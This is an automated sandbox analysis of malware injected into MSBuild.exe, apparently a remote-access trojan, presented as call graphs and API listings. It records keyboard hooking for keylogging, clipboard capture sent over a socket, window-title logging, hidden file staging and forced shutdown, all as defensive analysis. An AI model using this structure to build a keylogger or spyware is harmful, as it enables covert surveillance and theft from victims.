47204->46864 47205->46845 47207 403c39 47206->47207 47210 403c59 47207->47210 47211 403c68 47210->47211 47216 4032a4 47211->47216 47213 403c74 47214 402325 28 API calls 47213->47214 47215 403b73 47214->47215 47215->46864 47217 4032b0 47216->47217 47218 4032ad 47216->47218 47221 4032b6 28 API calls 47217->47221 47218->47213 47222->46868 47224 404bd0 47223->47224 47225 40245c 28 API calls 47224->47225 47226 404be4 47225->47226 47226->46871 47227->46875 47229 401e94 47228->47229 47231 41a471 47230->47231 47232 41b168 GetCurrentProcess 47230->47232 47233 412513 RegOpenKeyExA 47231->47233 47232->47231 47234 412541 RegQueryValueExA RegCloseKey 47233->47234 47235 412569 47233->47235 47234->47235 47236 401f66 28 API calls 47235->47236 47237 41257e 47236->47237 47237->46888 47238->46896 47240 40b02f 47239->47240 47243 40b04b 47240->47243 47242 40b045 47242->46907 47244 40b055 47243->47244 47246 40b060 47244->47246 47247 40b138 28 API calls 47244->47247 47246->47242 47247->47246 47248->46910 47249->46913 47251 40230d 47250->47251 47252 402325 28 API calls 47251->47252 47253 401f80 47252->47253 47253->46663 47272 43a545 47254->47272 47256 43998b 47281 4392de 38 API calls 2 library calls 47256->47281 47258 439950 47258->47256 47259 439965 47258->47259 47271 40dd54 47258->47271 47279 445354 20 API calls _abort 47259->47279 47261 43996a 47280 43a827 26 API calls _Deallocate 47261->47280 47264 439997 47265 4399c6 47264->47265 47282 43a58a 42 API calls __Toupper 47264->47282 47266 439a32 47265->47266 47283 43a4f1 26 API calls 2 library calls 47265->47283 47284 43a4f1 26 API calls 2 library calls 47266->47284 47269 439af9 _strftime 47269->47271 47285 445354 20 API calls _abort 47269->47285 47271->46678 47271->46680 47273 43a54a 47272->47273 47274 43a55d 47272->47274 47286 445354 20 API calls _abort 47273->47286 47274->47258 47276 43a54f 47287 43a827 26 API calls _Deallocate 47276->47287 47278 43a55a 47278->47258 47279->47261 47280->47271 47281->47264 47282->47264 47283->47266 
47284->47269 47285->47271 47286->47276 47287->47278 47288->46956 47290 409855 47289->47290 47291 4124b7 3 API calls 47290->47291 47292 40985c 47291->47292 47293 409870 47292->47293 47294 40988a 47292->47294 47295 4095cf 47293->47295 47296 409875 47293->47296 47308 4082dc 47294->47308 47295->46715 47298 4082dc 28 API calls 47296->47298 47300 409883 47298->47300 47334 409959 29 API calls 47300->47334 47303 409888 47303->47295 47304->46981 47464 402d8b 47305->47464 47307 4028dd 47307->46984 47309 4082eb 47308->47309 47335 408431 47309->47335 47311 408309 47312 4098a5 47311->47312 47340 40affa 47312->47340 47315 4098f6 47318 401f66 28 API calls 47315->47318 47316 4098ce 47317 401f66 28 API calls 47316->47317 47319 4098d8 47317->47319 47320 409901 47318->47320 47321 41ae08 28 API calls 47319->47321 47322 401f66 28 API calls 47320->47322 47323 4098e6 47321->47323 47324 409910 47322->47324 47344 40a876 31 API calls ___crtLCMapStringA 47323->47344 47326 41a686 79 API calls 47324->47326 47327 409915 CreateThread 47326->47327 47329 409930 CreateThread 47327->47329 47330 40993c CreateThread 47327->47330 47350 4099a9 47327->47350 47328 4098ed 47331 401eea 26 API calls 47328->47331 47329->47330 47356 409993 47329->47356 47332 401e13 26 API calls 47330->47332 47353 4099b5 47330->47353 47331->47315 47333 409950 47332->47333 47333->47295 47334->47303 47463 40999f 134 API calls 47334->47463 47336 40843d 47335->47336 47338 40845b 47336->47338 47339 402f0d 28 API calls 47336->47339 47338->47311 47339->47338 47342 40b006 47340->47342 47341 4098c3 47341->47315 47341->47316 47342->47341 47345 403b9e 47342->47345 47344->47328 47346 403ba8 47345->47346 47348 403bb3 47346->47348 47349 403cfd 28 API calls 47346->47349 47348->47341 47349->47348 47359 409e48 47350->47359 47392 40a3f4 47353->47392 47441 4099e4 47356->47441 47360 409e5d Sleep 47359->47360 47379 409d97 47360->47379 47362 4099b2 47363 409eae GetFileAttributesW 47367 409e6f 47363->47367 47364 409e9d CreateDirectoryW 47364->47367 
47365 409ec5 SetFileAttributesW 47365->47367 47366 41b58f 4 API calls 47366->47367 47367->47360 47367->47362 47367->47363 47367->47364 47367->47365 47367->47366 47369 401d64 28 API calls 47367->47369 47377 409f10 47367->47377 47368 409f3f PathFileExistsW 47368->47377 47369->47367 47370 41b61a 32 API calls 47370->47377 47371 401f86 28 API calls 47371->47377 47372 40a048 SetFileAttributesW 47372->47367 47373 406052 28 API calls 47373->47377 47374 401eef 26 API calls 47374->47377 47375 401eea 26 API calls 47375->47377 47376 41b687 4 API calls 47376->47377 47377->47368 47377->47370 47377->47371 47377->47372 47377->47373 47377->47374 47377->47375 47377->47376 47378 401eea 26 API calls 47377->47378 47378->47367 47380 409e44 47379->47380 47382 409dad 47379->47382 47380->47367 47381 409dcc CreateFileW 47381->47382 47383 409dda GetFileSize 47381->47383 47382->47381 47384 409e0f CloseHandle 47382->47384 47385 409e21 47382->47385 47386 409e04 Sleep 47382->47386 47391 40a7f0 83 API calls 47382->47391 47383->47382 47383->47384 47384->47382 47385->47380 47388 4082dc 28 API calls 47385->47388 47386->47384 47389 409e3d 47388->47389 47390 4098a5 125 API calls 47389->47390 47390->47380 47391->47386 47398 40a402 47392->47398 47393 4099be 47394 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 47396 40b027 28 API calls 47394->47396 47396->47398 47398->47393 47398->47394 47400 41aca0 GetTickCount 47398->47400 47401 40a4a2 GetWindowTextW 47398->47401 47403 401e13 26 API calls 47398->47403 47404 40a5ff 47398->47404 47405 40affa 28 API calls 47398->47405 47407 40a569 Sleep 47398->47407 47410 401f66 28 API calls 47398->47410 47411 40a4f1 47398->47411 47416 4028cf 28 API calls 47398->47416 47417 405ce6 28 API calls 47398->47417 47418 41ae08 28 API calls 47398->47418 47419 409d58 27 API calls 47398->47419 47420 401eea 26 API calls 47398->47420 47421 433519 5 API calls __Init_thread_wait 47398->47421 47422 4338a5 29 API calls __onexit 47398->47422 47423 4334cf EnterCriticalSection 
LeaveCriticalSection SetEvent ResetEvent 47398->47423 47424 4082a8 28 API calls 47398->47424 47426 40b0dd 28 API calls 47398->47426 47427 40ae58 44 API calls 2 library calls 47398->47427 47428 440c51 47398->47428 47432 404c9e 28 API calls 47398->47432 47400->47398 47401->47398 47403->47398 47406 401e13 26 API calls 47404->47406 47405->47398 47406->47393 47407->47398 47410->47398 47411->47398 47412 4082dc 28 API calls 47411->47412 47425 40a876 31 API calls ___crtLCMapStringA 47411->47425 47412->47411 47416->47398 47417->47398 47418->47398 47419->47398 47420->47398 47421->47398 47422->47398 47423->47398 47424->47398 47425->47411 47426->47398 47427->47398 47429 440c5d 47428->47429 47433 440a4d 47429->47433 47432->47398 47434 440a64 47433->47434 47438 440aa5 47434->47438 47439 445354 20 API calls _abort 47434->47439 47436 440a9b 47440 43a827 26 API calls _Deallocate 47436->47440 47438->47398 47439->47436 47440->47438 47442 409a63 GetMessageA 47441->47442 47443 4099ff SetWindowsHookExA 47441->47443 47444 409a75 TranslateMessage DispatchMessageA 47442->47444 47456 40999c 47442->47456 47443->47442 47446 409a1b GetLastError 47443->47446 47444->47442 47444->47456 47457 41ad46 47446->47457 47450 409a3e 47451 401f66 28 API calls 47450->47451 47452 409a4d 47451->47452 47453 41a686 79 API calls 47452->47453 47454 409a52 47453->47454 47455 401eea 26 API calls 47454->47455 47455->47456 47458 440c51 26 API calls 47457->47458 47459 41ad67 47458->47459 47460 401f66 28 API calls 47459->47460 47461 409a31 47460->47461 47462 404c9e 28 API calls 47461->47462 47462->47450 47465 402d97 47464->47465 47468 4030f7 47465->47468 47467 402dab 47467->47307 47469 403101 47468->47469 47471 403115 47469->47471 47472 4036c2 28 API calls 47469->47472 47471->47467 47472->47471 47474 403b48 47473->47474 47480 403b7a 47474->47480 47477 403cbb 47484 403dc2 47477->47484 47479 403cc9 47479->46993 47481 403b86 47480->47481 47482 403b9e 28 API calls 47481->47482 47483 403b5a 47482->47483 47483->47477 47485 
Control-flow graph edge listing for the preceding function (rendered graph data, not reproduced; the node labels name the same APIs listed under each function below, e.g. GlobalMemoryStatusEx, GetForegroundWindow/GetWindowTextW, TerminateProcess/WaitForSingleObject, ExitProcess).

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
• GetProcAddress.KERNEL32(00000000), ref: 0041BD01
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
• GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
• GetProcAddress.KERNEL32(00000000), ref: 0041BD30
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
• GetProcAddress.KERNEL32(00000000), ref: 0041BD44
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
• GetProcAddress.KERNEL32(00000000), ref: 0041BD58
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
• GetProcAddress.KERNEL32(00000000), ref: 0041BD68
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
• GetProcAddress.KERNEL32(00000000), ref: 0041BD78
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
• GetProcAddress.KERNEL32(00000000), ref: 0041BD88
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
• GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
• GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
• GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
• GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
• GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
• GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
• GetProcAddress.KERNEL32(00000000), ref: 0041BE09
• LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
• GetProcAddress.KERNEL32(00000000), ref: 0041BE19
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
• GetProcAddress.KERNEL32(00000000), ref: 0041BE53
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
• GetProcAddress.KERNEL32(00000000), ref: 0041BE63
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleLibraryLoadModule
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
• API String ID: 384173800-625181639
• Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
• Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
• Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
• Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

Control-flow Graph

APIs
• OpenClipboard.USER32 ref: 004159C7
• EmptyClipboard.USER32 ref: 004159D5
• GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
• GlobalLock.KERNEL32(00000000), ref: 004159FE
• GlobalUnlock.KERNEL32(00000000), ref: 00415A34
• SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
• CloseClipboard.USER32 ref: 00415A5A
• OpenClipboard.USER32 ref: 00415A61
• GetClipboardData.USER32(0000000D), ref: 00415A71
• GlobalLock.KERNEL32(00000000), ref: 00415A7A
• GlobalUnlock.KERNEL32(00000000), ref: 00415A83
• CloseClipboard.USER32 ref: 00415A89
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
• String ID:
• API String ID: 3520204547-0
• Opcode ID: 3a7e4f33a3e022d1b01f4a7aa625db061848c5be4a14c20c955616a9f3133e94
• Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
• Opcode Fuzzy Hash: 3a7e4f33a3e022d1b01f4a7aa625db061848c5be4a14c20c955616a9f3133e94
• Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A

Control-flow Graph

• Executed
• Not Executed
Control-flow graph node listing for basic blocks 4099e4-409a96 (rendered graph not reproduced; the blocks call SetWindowsHookExA, GetLastError, GetMessageA, TranslateMessage and DispatchMessageA, as listed under APIs below).
APIs
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
• SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
• GetLastError.KERNEL32 ref: 00409A1B
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
• TranslateMessage.USER32(?), ref: 00409A7A
• DispatchMessageA.USER32(?), ref: 00409A85
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
• String ID: Keylogger initialization failure: error $`#v
• API String ID: 3219506041-3226811161
• Opcode ID: 0500c0fb2287cc403513c8d0c8af8369f78a70941d761820a418b2e0bcaa973e
• Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
• Opcode Fuzzy Hash: 0500c0fb2287cc403513c8d0c8af8369f78a70941d761820a418b2e0bcaa973e
• Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB

Control-flow Graph

APIs
  • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
  • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
  • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
• Sleep.KERNEL32(00000BB8), ref: 0040E603
• ExitProcess.KERNEL32 ref: 0040E672
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CloseExitOpenProcessQuerySleepValue
• String ID: 5.3.0 Pro$override$pth_unenc$BG
• API String ID: 2281282204-3981147832
• Opcode ID: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
• Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
• Opcode Fuzzy Hash: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
• Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF

Control-flow Graph

APIs
  • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
  • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
  • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
  • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
  • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
• ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
• LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
• GetProcAddress.KERNEL32(00000000), ref: 00415977
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
• String ID: PowrProf.dll$SetSuspendState
• API String ID: 1589313981-1420736420
                                                                                                                        • Opcode ID: 56eed2a0c493a37a9ebd172ea33a7f1355f0ef0f1c53220ea3ac6de77a0ff222
                                                                                                                        • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                                        • Opcode Fuzzy Hash: 56eed2a0c493a37a9ebd172ea33a7f1355f0ef0f1c53220ea3ac6de77a0ff222
                                                                                                                        • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                        Strings
                                                                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Create$EventLocalThreadTime
                                                                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                        • API String ID: 2532271599-1507639952
                                                                                                                        • Opcode ID: 91fcc87cdf63508fbb142367321fb0c568eb54b34a3fc30a6c2ed25526885608
                                                                                                                        • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                                        • Opcode Fuzzy Hash: 91fcc87cdf63508fbb142367321fb0c568eb54b34a3fc30a6c2ed25526885608
                                                                                                                        • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                                                        APIs
                                                                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                                                        • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1815803762-0
                                                                                                                        • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                        • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                                        • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                        • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                                        APIs
                                                                                                                        • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                                                        • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Name$ComputerUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4229901323-0
                                                                                                                        • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                                        • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                                        • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                                        • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2299586839-0
                                                                                                                        • Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                                        • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                                        • Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                                        • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: recv
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1507349165-0
                                                                                                                        • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                        • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                                        • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                        • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 0040D790
                                                                                                                          • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
